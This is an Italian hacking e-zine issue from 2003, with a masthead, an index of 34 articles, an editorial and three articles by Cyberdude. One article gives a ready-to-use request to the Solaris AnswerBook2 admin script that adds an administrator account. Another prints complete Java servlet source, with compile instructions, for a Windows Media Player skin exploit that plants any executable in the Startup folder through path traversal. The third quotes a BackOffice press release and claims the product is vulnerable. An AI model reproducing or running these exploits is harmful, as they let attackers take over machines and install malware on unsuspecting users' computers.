+==============================================[ INFORMAZIONELIBERA E-ZINE®05 ]+
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|                   <<<---------------------------------->>>                   |
|                   >>>     Italian Underground crew     <<<                   |
|                   <<<        INFORMAZIONELIBERA®       >>>                   |
|                   >>>     +ST4M>P4-UN|D3RGR0:UN>D+     <<<                   |
|                   >>>            E-zine 05             <<<                   |
|                   >>>----------------------------------<<<                   |
|                                                                              |
|                   ...  combattiamo l'ignoranza informatica                   |
|                  L'HACKING NON E' UN CRIMINE! E' CONOSCENZA                  |
|                                                                              |
|+============================================================================+|
|+[ http://www.informazionelibera.cjb.net ~ http://www.informazionelibera.tk ]+|
|+========[ mailto: cyberdudeIL@libero.it or cyberdudemail@libero.it ]========+|
|+============================================================================+|
+------------------------------------------------------------------------------+
| Il sEsTo nUmErO  DeLlA  E-ZiNe  rIgUarDAnTe l'uNdErGRoUnD ItAlIaNo NeL MoNdO |
+------------------------------------------------------------------------------+ 
+------------------------------------------------------------------------------+
|       ©Copyright Informazionelibera E-zine® 6°edizione Novembre 2003         |  
+------------------------------------------------------------------------------+ 
[ DiSCLAiMER ]-----------------------------------------------------------------+
|Nota bene: Informazionelibera non si riterrà responsabile di eventuali  danni | 
|provocati dal cattivo utilizzo delle notizie presenti in questa  e-zine!tutti | 
|gli articoli sono scritti a scopo  dimostrativo  con  l'intento  di  spiegare | 
|e approfondire conoscenze informatiche. Qualsiasi uso  illecito   delle  info | 
|presenti nella e-zine è responsabilità del fautore di tale inflazione         |
+------------------------------------------------------------------------------+
[ CoStItUzIoNe dElLa rEpUbBlIcA ItAlIaNa ]-------------------------------------+
|Diritti e doveri dei cittadini: Rapporti civili                               |
|Articolo 21                                                                   |
|Tutti hanno  diritto di manifestare  liberamente  il proprio pensiero cone la |
|parola ,   lo  scritto   e   ogni   altro   mezzo    di   diffusione.   [...] |
+------------------------------------------------------------------------------+
+------------------------------------------------------------------------------+
|[ iNDiCE ]=[ IL05 ]======================================[ 34 articoli ]======|
|---[ INFO E-ZINE ]------------------------------------------------------------|
|------[ Editoriale ]---------------------------------------------[ Unrelated ]|
|---[ HACKiNG ]----------------------------------------------------------------|
|------[ Solaris AnswerBook2 vulnerabile con una stringa ]--------[ Cyberdude ]|
|------[ Win media player, utilità o trojan?? ]-------------------[ Cyberdude ]|
|------[ BackOffice cresce e arriva a 4.5! Si ma... ]-------------[ Cyberdude ]|
|------[ Come ottenere privilegi ellevati tramite KPopup ]-----------[ Marsio ]|
|------[ Piccolo Bug Di Kazaa ]---------------------------------[ LordScinawa ]|
|------[ L'indiano buggato ]-------------------------------------------[ Korn ]|
|------[ HTML Injection, come, dove e perchè ]----------------------[ Bigalex ]|
|------[ Webmail di Flashnet.it ]---------------------------------[ Unrelated ]|
|------[ Packet Injection (Internet Direct Attack) ]-------------------[ Evil ]|
|---[ OVERCLOCK ]--------------------------------------------------------------|
|------[ Scendere a Ring Zero in Windows9x ]----------------------[ active85k ]|
|------[ Da Duron a Athlon XP ]-----------------------------------[ Cyberdude ]|
|---[ PROGRAMMAZIONE ]---------------------------------------------------------|
|------[ Algoritmi genetici Parte Prima ]-------------------------[ Imperiorx ]|
|------[ Object Oriented Programming ]--------------------------[ SysOv3rrid3 ]|
|------[ open() e sysopen() in Perl ]---------------------------------[ f4ke^ ]|
|------[ Tutorial 4 Turbo Pascal ]-----------------------------------[ Eimiar ]|
|------[ Crypter in Turbo pascal conveniente ]-----------------------[ Eimiar ]|
|------[ Ascii Taker ]-----------------------------------------------[ Eimiar ]|
|---[ MIRC SCRIPTING ]---------------------------------------------------------|
|------[ Grafica in mirc ]---------------------------------------[ Blacksword ]|
|---[ LINUX ]------------------------------------------------------------------|
|------[ How to: Punguin's Fdisk ]-----------------------------------[ Native ]|
|------[ RtLinux e le applicazioni realtime ]------------------------[ Marsio ]|
|---[ CRACK , REVERSING & CRITTOGRAFIA ]---------------------------------------|
|------[ RSA defeating 'n reversing ]-------------------------------[ Evilcry ]|
|------[ WinImage 6_10 ovvero uno schema di protezione deludente ]--[ Evilcry ]|
|------[ Fant0m Crackmes Reversiamoli tutti e cinque + Autokeygen ]-[ Evilcry ]|
|------[ Detten12 reversing ]---------------------------------------[ Evilcry ]|
|------[ Genetic Algorithms an overview #1 ]------------------------[ Evilcry ]|
|------[ Trasformiamo un crackme in un generatore di chiavi! ]----[ active85k ]|
|------[ Serial Fishing Popup Sweeper ]-----------------------------[ Graftal ]|
|---[ NETWORKING & SIMILI ]----------------------------------------------------|
|------[ Apriamo Fastweb ]-------------------------------------------[ Tailot ]|
|---[ FOR NEWBIE ]-------------------------------------------------------------|
|------[ Pizza con smurf ben cotto, grazie ]--------------------[ LordScinawa ]|
|------[ Irc Mirc e il suo DCC buggato ]--------------------------[ Cyberdude ]|
|---[ RECENSIONI ]-------------------------------------------------------------|
|------[ 64bit-The revolution is begining ]---------------------[ SysOv3rrid3 ]|
|---[ ESPERIMENTI ]------------------------------------------------------------|
|------[ Rapporto 6266 in T9 ]------------------------------------[ Unrelated ]|
|---[ FILOSOFIA HACK ]---------------------------------------------------------|
|------[ Cosa comportano i nuovi piani tariffari ]------------------[ Bigalex ]|
|------[ Classifiche siti taroccabili ]------------------------------[ Tailot ]|
|---[ ERRORI NEL NUMERO PRECEDENTE ]-------------------------------------------|
|------[ Erroraccio ]------------------------------------------------[ Eimiar ]|
|[ EnD ]=======================================================================|
|                     _________________________________________________________| 
|____________________/…  Questo  numero  della  e-zine è  dedicato interamente |
| agli italiani morti inutilmente in IRAQ! Per non dimenticare  che la  guerra |
| non  serve a niente e provoca solo male e distruzione a tutti !! Basta  fare |
| la guerra!! ... ONORE AI CADUTI !!!                                          | 
+------------------------------------------------------------------------------+
 

+--------------------------------------------------------------[open the file]-+
|[ INFO E-ZINE ]                                                               | 
|-- Editoriale                                                                 |
|-- Unrelated <unrelated@libero.it>                                            |
|                     _________________________________________________________| 
|____________________/ 
ehm ehm... Venghino signori ad udir dei bei articoli, tecniche, brutti ceffi  ed
innovazioni...  ehm no così forse è un pò arcaico... cominciamo l'editoriale  in
questo  modo...  (Intanto mi scolo una mezza macchinetta  di  caffè  perchè  sto
morendo  dal  sonno)... va bè.. allora... (un attimo che finisco di  delirare  e
inizio) ecco.. ecco.. Un ragazzo\a come tutti gli altri va a scuola, fa un pò il
cretino con le ragazze e scherza con i suoi amici, poi di ritorno a casa  mangia
come  sua  consuetudine, e poi entra in un universo parallelo. Così sintetizzato
voi  lettori  potete  credere che sono troppo imbevuto di  matrix  e  delle  sue
baggianate intergalattiche, ma se osservate attentamente quello che creiamo noi,
rispetto  alla massa, capirete sicuramente che siamo proiettati in  una  diversa
prospettiva mentale; mentre gli altri si mangiano il pane con la nutella noi  ci
montiamo una lan e facciamo prove sui nostri 2 o + computer per trovare  qualche
possibile vulnerabilità e metre bestemmiamo zeus del perchè non funge un exloit,
passa  vostra nonna e vi dice : <<Quando finisci posso scopare per  terra  o  il
computer  va  in  tilt?>>,  dobbiamo pensare che  molte  persone  della  vecchia
generazione  e della nascente, da quello che ho potuto notare, hanno  paura  del
monitor  e  della  tastiera,  credono sia qualcosa  di  sovraumano,  misterioso,
bislacco...  in  effetti  per loro è tale realmente; quando  sentono  la  parola
computer spalancano gli occhi quasi come in preda al panico, essendo allo stesso
tempo illuminati e impauriti da ciò che non sanno...   ma noi? beh.. noi viviamo
paralleli in due mondi, abbiamo due cervelli, due conoscenze, quando siamo  soli
con la macchina ci dimentichiamo del mondo intorno, e cerchiamo di modificare il
nostro  mondo virtuale, stiamo ore davanti alla macchina con la luce del monitor
che  ci brucia gli occhi a tal punto che molti di noi hanno gradi di miopia  che
oscillano, come una colonnina di mercurio a marzo, dal 3 al 7. Nonostante questo
prima  di tutti gli altri abbiamo intuito che oltre alla vita reale c'è qualcosa
di  più,  una  vita fatta di numeri, di lettere, di variabili, di linguaggi  che
viene  condivisa  con il gruppo, nel quale ognuno di noi battito  dopo  battito,
attraverso  la  tastiera, scandisce il tempo della sapienza  in  una  dimensione
subnaturale,  ma che a noi non è estranea. Noi in questo giornale  non  facciamo
nient'altro  che  raccontare questa vita, questo modo di vivere anticonformista,
oserei underground digitale. Ma infondo siamo dei bambini curiosi, che si  fanno
mille perchè tra di loro. Siamo persone matte, depresse, psicopatiche, perverse,
autistiche,  isolate  ma felici; che più sanno, più hanno il  gusto  di  sapere.
Abbiamo  bisogno della conoscenza perchè la notte non riusciamo a dormire senza,
peggio di una droga, peggio di una ragazza\o che ci fa impazzire, questa cosa si
chiama  passione. Siamo in bilico, tra un baratro di oscurità  e  un  tunnel  di
luce,  basta  che la presa sia staccata e noi smettiamo di esistere, barcolliamo
nel  buio  finchè  la  ventola  non si riaziona.  1  2  3  via..  correte  verso
l'impossibile,  perchè  l'impossibile siamo noi, umili studiosi,  cacciatori  di
verità,  filologi di linguaggi obsoleti. Tra queste parole che dalla  mia  mente
confluiscono sulla tastiera, avrei moltissime cose da raccontarvi, ma  solo  una
sintetizza  tutte le altre nel volermi congedare da voi membri:  <<  ciao  ragà!
Grazie  di tutto> e a voi lettori << buona lettura e fateci pubblicità  ;-)  >>,
ricordandovi che siete sempre i benvenuti nel nostro canale.

N.B. 
Ciao ragazzi sono Cyberdude ... approfitto di questa presentazione della  e-zine 
per precisare una cosa : il Korn che è andato via (leggi la storia di IL) non  è
la stessa persona che collabora ora con noi!! Lo dico perchè alcuni  lettori  si 
son accaniti contro quest'ultimo !! Vi ricordo che ognuno ha la libertà di  fare 
ciò che vuole ... ognuno pensa con la proprio testa ok?? Lasciamo  la libertà di 
scelta agli altri! ora vi lascio alla lettura della e-zine ciao a tutti 



+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Solaris AnswerBook2 vulnerabile con una stringa                            |
|-- Cyberdude <cyberdudeIL@libero.it>                                          |
|                     _________________________________________________________| 
|____________________/ 
Buona  sera  ragazzi…  21  ottobre 2003 ore 20:24 sto  nello  studio  ascoltando
Articolo31  –  Voglio una lurida oppure Tocca qui hhehehe che  pezzo!!  Dovreste
sentirvela ti da la carica … e mi ci vuole proprio perché ancora una  volta  non
ci  siamo visti!!! Ma quando viene il giorno che mi piglio la patente?? comunque
vabbè a voi che ve ne frega? Non lo so e sebbene mi abbiano detto più persone di
non  parlare dei miei cazzi negli articoli che scrivo non riesco a farne a  meno
hihihi  quindi se volete leggere i miei articoli beccatevi pure un  po’  di  sti
cazzi  miei!!  Comunque  da questo momento in poi comincia  il  vero  e  proprio
articolo  promesso!! Ok?? START hihihi signore e signori, ledies  and  gentleman
(non  so se si scrive così … non sono un mostro in inglese) ecco a voi Cyberdude
e  Solaris AnswerBook2 Interfaccia per l’accesso dell’amministrastore …  ma  che
cazzo  ho  detto?? Non lo so… so solo che stasera sto a metà tra  il  nervosismo
cronico e lo stress, comunque in pratica l’articolo parla di solaris come  avete
potuto  capire  dal  “titolo” !!! Dunque visto che io non  sono  molto  bravo  a
scrivere le recensioni passo parola ai rappresentanti Microsoft che meglio di me
sapranno  presentarvi il loro prodotto… hihihi tanto io vi  devo  solo  spiegare
come  sfruttare  un'altra  vulnerabilità dovuta  all’inettitudine  di  questi  …
comunque più ne parliamo più facciamo sentire la nostra voce, più si decidono  a
farci  un  software  più  sicuro giusto?? Si credo proprio  di  si!!  Dunque  la
microsoft  (per  la microsoft intendo i rappresentanti che ne  parlano  su  reti
nazionali  televisive e ne scrivono sui siti) dice così : L'ambiente Solaris(TM)
è  basato sull'interfaccia grafica utente OPEN LOOK©… al che aggiungono ancora :
costituito   dall'ambiente   OpenWindows  e  dalle  applicazioni   DeskSet.   Le
applicazioni   DeskSet  sono  un  insieme  di  programmi   standard,   tra   cui
un'applicazione di posta elettronica e un editor di testo.
Per  iniziare  una  sessione  di lavoro è necessario  effettuare  il  login.  La
procedura  di  login  permette  al sistema di identificare  l'utente  e  le  sue
autorizzazioni. Al termine della sessione occorre invece eseguire il logout, per
impedire  l'accesso  ai  propri file da parte di  utenti  non  autorizzati!!  In
pratica  se  questi usano paroloni troppo grossi, vi faccio io  il  succo  della
situazione,  la procedura di login permette al sistema di identificare  l'utente
quando  entra in Solaris e le sue rispettive autorizzazioni… quando poi  abbiamo
finito  di  fare  i nostri porci comodi ci viene calorosamente  raccomandato  di
eseguire la il logout … ma che vorrà mai dire?? Provate a indovinare!!!In questo
modo  si  rende  il  sistema disponibile per l'accesso di  altri  utenti!  Tutto
chiaro?  Wow  a  leggere  una cosa del genere si direbbe  …  che  bel  pezzo  di
OpenWindows (giusto per rimanere in tema) … poi il lettore continua  con  questo
articolo  e  scopre che anche questa volta il buon vecchio volpone dello  zietto
Bill  Gates ha toppato!! Ma questo tutti sti miliardi come se li è fatti?? Vabbè
non  ne  voglio parlare troppo male visto che io uso WinXP hihihih il sistema  +
baggato del secolo (dopo Win Millenium)!! Comunque veniamo al dunque, visto  che
ho  ancora  pochissimo  tempo  a disposizione, altrimenti  mi  sarebbe  piaciuto
davvero  molto  rimanere qui a scrivere iihihihi … ok faccio  il  serio!  Dunque
parlo di AnswerBook2 versioni 1.4.2 (e precedenti) , che succede?? Diciamo  solo
che  non è molto sicura l’identificazione in quanto i controlli sono molto terra
terra!! Qual è il vantaggio? Il nostro vantaggio? È semplice… a causa di  questo
erroraccio, chiunque può crearsi un account da amministratore sul sistema! Bella
cacchiata  vero?  E scusatemi se lo ripeto ma voglio che le cose  siano  chiare…
chiunque  può  farlo.  Basta  semplicemente accedere  tramite  lo  script  /cgi-
bin/admin/admin  presente  sotto il web server AnswerBook2  dwhttpd!!  A  questo
punto  chi  vieterebbe  ad  un aggressore di leggere i  file  di  registrazione,
farsene  quello che ritiene più idoneo al suo scopo e gestire il  contenuto  per
scopi  propri?? Beh direi nessuno … adesso suppongo che vogliate  anche  che  vi
riporti un esempio in modo da non lasciare l’articolo incompleto e tutte  queste
parole  inutilmente  sprecate!  Vero? Ok … vi  riporto  questa  stringa  un  po’
lunghetta e vi do appuntamento alla proxima volta ;)


http://www.example.com:8888/cgi-bin/
admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe

Ragazzi non è un sito … sia chiaro hihihih è un esempio, adesso se avete  capito
almeno  un  minimo di tutte queste cazzate che ho sparato in questa fredda  sera
d’autunno direi che avete capito che dovete applicare l’esempio sul vostro  buon
vecchio  Solaris … fatemi sapere se ne avete trovato qualcuno e  soprattutto  se
questo  “articoletto” è servito a qualche cosa ok?? Ora ci metto un punto perché
sono  le  20:55 (cavolo quanto ci ho messo hihihi). Ora vado di la mi  metto  il
pigiama  bello calduccio, mi infilo nel letto e chiamo Lory (e che vuoi  di  più
dalla  vita  uno squallido Martedì sera?… e non mi rispondete un Lucano  che  vi
pesto!)

Ciao a tutti

Cyberdude [INFORMAZIONELIBERA FOUNDER]
mailto : cyberdudemail@libero.it ~ cyberdudeIL@libero.it
website  :  http://www.informazionelibera.cjb.net ~ http://www.area91.da.ru  (ma
questo  non  è  molto aggiornato, è il mio vecchio sito che ormai  non  aggiorno
neanche più, ma vi consiglio di visitarlo, non è niente male)

ps… ragazzi se ci sono gravi errori (di qualsiasi tipo) vi prego di scusarmi  ma
non  è  serata e ho scritto tanto per svagare un po’ con le cervella!! Ok??  Può
darsi pure che ho scritto solo un mucchio di cazzate senza senso … poi domani lo
rileggo, comunque stasera l’articolo è questo! Hahaha ciao ;)


+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Win media player, utilità o trojan??                                       |
|-- Cyberdude <cyberdudeIL@libero.it>                                          |
|                     _________________________________________________________| 
|____________________/ 
Caspita…  sembra proprio che con tutto questo popò di articoli c’è qualcuno  che
viene  a leggere qualcosa scritto da me !! Grazie mie fedeli lettori, vi  voglio
bene!  Eheheh  Dunque  22:51  di Domenica 26 ottobre  2003  situazione  alquanto
tranquilla,  meno di 55 secondi fa ero a tel con la mia ragazza  (sapete  com’è)
adesso sono qui avanti al pc senza uno scopo preciso, la situazione è sempre  la
stessa…  che cazzo l’acqua non c’è … ditemi voi se nel 2003 per lavarci dobbiamo
prendere  l’acqua  dal frigo e riscaldarla nel microonde ma che  vita  di  merda
ahhehehe!!  Comunque  a  finale i progressi ci sono sempre,  e  a  proposito  di
progressi  voglio parlarvi di un progresso firmato zio billtiello gates  (marchi
microsoft)  … ora voi direte eh ti pareva che cyberdude non si accanisce  contro
la  microsoft! Alcuni di voi penseranno che tenga come sfondo la faccia di  Bill
Gates  nel  cartello di divieto! E invece ho un bel WinXP con tanto di Microsoft
Word  sul quale scrivo ma … che ci volete fare, la microsoft è tanto cara quanto
bucata  hehehe eh si fa acqua da tutte le parti! La volete sapere l’ultima?  Per
gli amanti delle falle eccovi una chicca ;)

Sono risultati vulnerabili a questo problemino :

Microsoft Windows Media Player XP
   + Microsoft Windows XP Home
   + Microsoft Windows XP Professional

&

Microsoft Windows Media Player 7.1
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a

Mentre invece sono immuni al problema :

Microsoft Windows Media Player 9.0
   + Microsoft Windows Server 2003 Datacenter Edition
   + Microsoft Windows Server 2003 Datacenter Edition 64-bit
   + Microsoft Windows Server 2003 Enterprise Edition
   + Microsoft Windows Server 2003 Enterprise Edition 64-bit
   + Microsoft Windows Server 2003 Standard Edition
   + Microsoft Windows Server 2003 Web Edition

Detto  questo proporrei di passare ad esaminare il problema … che succede questa
volta??  Dunque sicuramente avrete capito che stiamo parlando di  Windows  Media
Player, e molti di voi sapranno sicuramente cosa sia uno skin!! Per i pochi  che
non  lo  sanno  skin in italiano si traduce con la parola pelle e vuol  dire  in
pratica  la  grafica del programma… Si perché noi possiamo andare  su  Selezione
interfaccia  (in  basso sulla colonna di sinistra) e poi cliccando  in  alto  su
Altre  interfacce … che succede? Scegliamo la “pelle” che più ci  piace  per  il
Media  Player  e questo da solo e automaticamente lo scaricherà e istallerà  per
noi!!  Ora quello che il mio cervelletto è andato a pensare è la seguente  cosa:
mettiamoci  nei panni di un hacker o di un buon furbacchione… come  farebbe  per
sfruttare  al  meglio questa bufalata?? Così mi son detto  …  se  io  prendo  un
programma (che esso sia un virus, un trojan, una foto o un qualunque altra cosa)
e  faccio  credere a media player che invece è uno skin …questo direttamente  lo
scaricherà  e  lo istallerà per me!! Grazie zio Bill sei un genio!!  Non  so  se
queste  cose  le  fai appositamente per gli smanettoni o se  invece  ti  vengono
naturali  comunque alla fine, come la metti metti che ci va a  guadagnare  siamo
sempre  noi!!  Quindi  abbiamo detto che se facciamo credere,  se  riusciamo  ad
illudere  il  mediaplayer che quello che vogliamo fargli scaricare  è  uno  skin
questo  fa tutto da solo senza che l’utente ci metta il dito… il poverino ignaro
crede   di  prendere  uno  skin  e  invece  si  ritrova  istallato  un   virus!!
Aaiaiaiaaiiaai  … Adesso sono un po’ indeciso se spiegarvi o meno  come  fare  a
sfruttare  tale funzione, da una parte penso… beh i programmatori lo sanno  fare
lo stesso e non credo che si mettono a fare i lamerozzi!! Ma se poi lo allego  e
qualche lamer sfrutta il sorgente?? Eh qui so cavoli… allora penso no… non metto
niente!  Però poi me li vedo gia tutti i miei lettori newbie dinnanzi  a  questo
testo  che  dicono: siamo arrivati fin qui e ora?? Ci abbandoni  così??  No  non
posso  abbandonarli!!  Dopotutto  io  mi  batto  per  diffondere  l’informazione
liberamente… quindi preciso che non voglio assolutamente che qualcuno usi queste
info  per  creare  macelli!!! Ragazzi lo studio del sorgente che  vi  allego  di
seguito  deve  essere  solo  qualcosa che vi aiuti a  capire  come  è  possibile
sfruttare  tale bug, non deve essere un’arma (scritta da altri…  quindi  è  pure
poco  professionale) per dar fastidio agli altri!! Ok??? Vabbè mi fido  di  voi,
questo  sorgente è un file .java!! Originariamente non era concepito per  essere
sfruttato su computer italiani in quanto aveva solo configurazione per  computer
inglesi e tedeschi… ma io mi son detto eh noi stiamo in Italia, che facciamo?gli
italiani  non lo possono usare? Eheheh eh no!!! E allora l’ho modificato  (anche
se  a  dire  il  vero dovrei vantarmene poco perché si tratta di aggiungere  una
stringa) comunque era giusto per dire che ci ho messo uno zampettino anche  io!!
Eheheh  con  questo vi saluto e vi do appuntamento al prossimo articolo  !!  cià
wagliù

-[ TAGLIA QUI ]------------------[ WinMediaPlayerExploit.java ]-----------------

import javax.servlet.http.HttpServlet; 
import javax.servlet.http.HttpServletRequest; 
import javax.servlet.http.HttpServletResponse; 
import javax.servlet.ServletException; 
import javax.servlet.ServletOutputStream; 
import java.io.*; 

public class MediaPlayerExploit extends HttpServlet { 
 
    private static final int BUFFER_SIZE = 1024; 
 
    private static final String[] paths = new String[] { 
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Avvio%20Menu%5CProgrammi%5CEsecuzione automatica%5c", // Italiano
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English 
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch 
    }; 
 
    private String payload; 
 
 
    public void init() throws ServletException { 
        payload = getInitParameter("executable"); 
    } 
 
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { 
 
        int language = 0; // default to english 
 
        try { 
            language = Integer.parseInt(request.getParameter("language")); 
        } catch (NumberFormatException ignored) {} 
 
        String path = paths[language]; 
 
        File file = new File(payload); 
 
        ServletOutputStream sos = response.getOutputStream(); 
 
        response.setContentType("application/download"); 
        response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz"); 
 
        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file)); 
        BufferedOutputStream bos = new BufferedOutputStream(sos); 
 
        byte buffer[] = new byte[BUFFER_SIZE]; 
 
        int datalength = 0; 
        while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { 
            bos.write(buffer,0,datalength); 
        } 
        bis.close(); 
        bos.close(); 
    } 
 
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { 
        doGet(request, response); 
    } 
 
} 


----[ TAGLIA QUI ]--------------------------------------------------------------

Piccoli accorgimenti dopo-articolo :
  1.  Ringrazio Brnocrist per avermi fornito il compilatore Java (altrimenti come
     facevo a provare l’exploit??)
2.  Ringrazio Giupo per avermi aiutato a risolvere il problema della Class Java
…
Riguardo  al problema 2 potrebbe capitare a chiunque che andando a compilare  il
file java vi da alcuni errori relativi alla mancanza delle class iniziali :
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
Come  si  risolve il problema?? Bisogna aggiungere al classpath di  compilazione
$J2EE_HOME/lib/j2ee.jar     .     A     riga     di      comando      -classpath
$CLASSPATH:%J2EE_HOME/lib/j2ee.jar:.: ok???
Ora vi saluto tutti … alla prossima

Cyberdude

+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- BackOffice cresce e arriva a 4.5! Si ma...                                 |
|-- Cyberdude <cyberdudeIL@libero.it>                                          |
|                     _________________________________________________________| 
|____________________/ 
Salve  miei  cari  lettori, ancora una volta ho ben poco da fare,  fuori  fa  un
freddo  cane,  sono  appena  tornato  da casa  di  Nicoletta  per  una  giornata
all’insegna della matematica e della geografia astronomica!!! Basta, ho  mal  di
testa!  Mi  ci  vuole una pausa (hehehe gia pensavate tutti alla  pubblicità)  …
comunque non ho niente di tanto interessante per le cervella da dire! Anzi  devo
ammettere  che  in  quest’ultimo periodo sto un po’ a  scarso  di  idee,  wagliù
aiutatemi  voi,  mandatemi qualche mail e ditemi che posso scrivere  ok???  Bene
comunque  non vi preoccupate non vi lascerò a bocca asciutta oggi  vi  parlo  di
backoffice!  Anzi  non ve ne parlo io, lascio che gli esperti  delle  recensioni
parlino per me, poi dopo vi spiego che ce ne possiamo fare di queste info  ok???
Bene leggiamo :

--------------------------------------------------------------------------------
BackOffice cresce e arriva a 4.5 


E’  disponibile la versione 4.5 di due delle applicazioni server  integrate  che
costituiscono la famiglia Microsoft BackOffice: BackOffice Small Business Server
e  BackOffice  Server. BackOffice è la soluzione progettata da  Microsoft  (tel.
0270398398, www.microsoft.com/italy) per offrire in un unico pacchetto tutte  le
funzionalità  di  elaborazione distribuita basata su Windows NT  Server  4.0,  e
contiene tutte le componenti server applicative che estendono le funzionalità di
NT  Server  4.0 verso il client/server. Tra i vantaggi offerti da BackOffice  ci
sono  la  possibilità  di  reperire le informazioni ovunque  queste  si  trovino
(server  NetWare,  Apple  Macintosh,  sistemi  Unix,  ecc.),  l’accesso  tramite
un’unica password a tutte le funzionalità della soluzione, l’interfaccia  aperta
per  l’integrazione con altre applicazioni basate su standard  e  le  estensioni
Internet contenute in Internet Information Server.
Small  Business Server viene definita come la soluzione di rete per  le  piccole
aziende che vogliono condividere e scambiare facilmente informazioni con partner
e  clienti: offre, oltre al server applicativo e di rete Windows NT Server  4.0,
un  sistema  per  la messaggistica interna ed esterna, un database  relazionale,
l’accesso  a Internet, servizi di condivisione di fax e modem e una  console  di
amministrazione.  Si  tratta  per sua natura di  una  soluzione  particolarmente
interessante  per  il  mercato italiano, costituito in  gran  parte  da  piccole
imprese. Il nostro Paese si è infatti dimostrato così ricettivo nei confronti di
questa  soluzione che per Microsoft, in questo particolare segmento, rappresenta
il  terzo mercato a livello mondiale dopo USA e Gran Bretagna: nell’anno fiscale
1998 sono state vendute in Italia 2 mila licenze server e 30 mila licenze client
di  SBS.  Le  novità  che  offre  la nuova versione  del  pacchetto  comprendono
anzitutto il numero massimo di licenze client, che è stato portato da 25  a  50;
le  nuove applicazioni sono Internet Information Server 4.0 (per la creazione di
siti Web professionali), SQL Server 7.0 (consente di creare più database SQL 7.0
con un limite di 10 GB ciascuno), Exchange Server 5.5 (server di messaggistica e
collaborazione),  Outlook  2000  (per gestire i messaggi,  gli  appuntamenti,  i
contatti  e  le attività), Proxy Server 2.0 (un gateway sicuro verso  Internet),
FrontPage  98  (per  creare  e gestire siti Web senza programmazione).  Numerose
altre  applicazioni  che  fanno  parte  di  BackOffice  SBS  sono  state  invece
migliorate.  Un’altra novità che è stata introdotta con la  versione  4.5  è  il
Migrate  User  Wizard, che rende rapida e semplice la migrazione da  Windows  NT
Server a Small Business Server. La versione di aggiornamento di BackOffice Small
Business  Server  4.5 sarà inviata gratuitamente, al momento del  suo  rilascio,
agli  utenti che possiedono la licenza per la versione 4.0. La versione 4.5  non
sarà  localizzata  ma  verrà  resa disponibile la  documentazione  in  italiano;
completamente tradotta, invece, sarà la successiva versione 5.0.
Anche BackOffice Server, che copre la fascia media dell’offerta BackOffice ed  è
destinato principalmente alle filiali, ai dipartimenti e alle medie imprese,  ha
riscosso  un  notevole successo: secondo Microsoft le vendite  sono  decuplicate
negli  ultimi 18 mesi, e in Italia ne sono state vendute 42 mila copie nell’anno
fiscale 1998. Tra le novità della release 4.5 si può citare uno script di  setup
riutilizzabili, che consente di replicare la configurazione di un singolo server
su quelli delle filiali, aiutando a mantenere la coerenza delle configurazioni e
a  contenere  i  costi di gestione. L’installazione risulta  semplificata  anche
grazie  all’aggiornamento del setup, che integra le procedure di  configurazione
per  SNA  Server, Systems Management Server e Site Server. Gli scenari di  setup
sono  opzioni  di  configurazione predefinite: una volta scelto  un  particolare
scenario,  BackOffice Server indica i componenti e i service pack da  installare
per  quella  soluzione. La nuova release introduce lo scenario "Branch  Office",
che si aggiunge alle opzioni esistenti. Altre novità sono la To Do List relativa
alle  attività di post-setup e l’upgrade automatico di BackOffice Small Business
Server alla versione 4.5. Ridotti i costi amministrativi delle licenze grazie  a
un’unica  licenza  per tutte le componenti installate su un  singolo  server.  A
seconda delle loro esigenze, gli utenti possono usare tutte le componenti o solo
alcune di esse.
--------------------------------------------------------------------------------

Quella  che  avete appena letto è una bella e dettagliata spiegazione reperibile
on-line  … quello che state per leggere è un’altra informazione reperibile  solo
in questo articolo (o forse anche da qualche altra parte che ha letto qui e l’ha
riportato o semplicemente lo ha gia scritto prima di me… comunque non badiamo  a
queste  casualità)!!!  Comunque dov’è il punto? Il punto  è  che  sia  Microsoft
BackOffice  4.0 che Microsoft BackOffice 4.5 su Microsoft Windows  NT  4.0  sono
vulnerabili  facilmente!! … questo articolo lo voglio dedicare a un ragazzo  che
incontrai l’altra volta in chan, aveva imparato come hackerare con FrontPage  da
un  articolo  e mi disse che era capace di entrare nel mio PC con Netbus  e  che
quindi dovevo stare attento a lui perchè era un hacker!! Amico mio essere hacker
non  vuol dire saper usare Netbus, essere hacker vuol dire anche usare  il  buon
vecchio  caro amico nostro chiamato CERVELLO … di tecniche per hackerare  ce  ne
sono  milioni e milioni, basta solo usare il cervello e cercare di sfruttare  le
info  che si hanno come meglio possiamo ok??? Scusate questa breve parentesi  ma
mi  sentivo  di  esprimere  questo giudizio in quanto  con  mio  rammarico  devo
ammettere  che  IRC pulula di “HACKER” che ti minacciano con il  netbus!!  Vabbè
basta!  Non capisco perchè i miei articoli escono sempre fuori traccia!! Heehheh
non riesco a seguire un filo logico, voi poverini che leggete siete costretti  a
sottolineare  i  soli  concetti fondamentali!! Scusatemi ma  sono  fatto  così!!
